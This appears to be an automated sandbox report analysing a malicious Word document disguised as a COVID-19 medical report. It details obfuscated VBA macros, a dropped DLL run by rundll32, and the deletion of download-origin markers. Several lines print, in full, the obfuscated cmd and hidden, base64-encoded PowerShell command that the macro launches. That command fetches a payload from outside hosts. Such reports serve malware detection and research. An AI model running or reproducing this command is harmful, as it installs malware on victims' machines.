Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: XP-9743 Medical report COVID-19.docInitial sample: OLE summary subject = Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: XP-9743 Medical report COVID-19.docStream path 'Macros/VBA/Gx8fznt8p0b' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Gx8fznt8p0b
Document contains an embedded VBA with many randomly named variablesShow sources
Source: XP-9743 Medical report COVID-19.docStream path 'Macros/VBA/Gx8fznt8p0b' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: S93E.dll.5.drStatic PE information: real checksum: 0x60901 should be: 0x5c940
Source: S93E.dll.5.drStatic PE information: section name: .text4
Source: S93E.dll.5.drStatic PE information: section name: .text5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001698 push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001113 push esp; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0015E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0014388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00143A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00143272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00144BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001423D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00184BAB push ebp; iretd

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Giyrh\pugu.vsmJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Giyrh\pugu.vsm:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ipdtn\rmgx.ktd:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fmtjatw\czosow.gcn:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
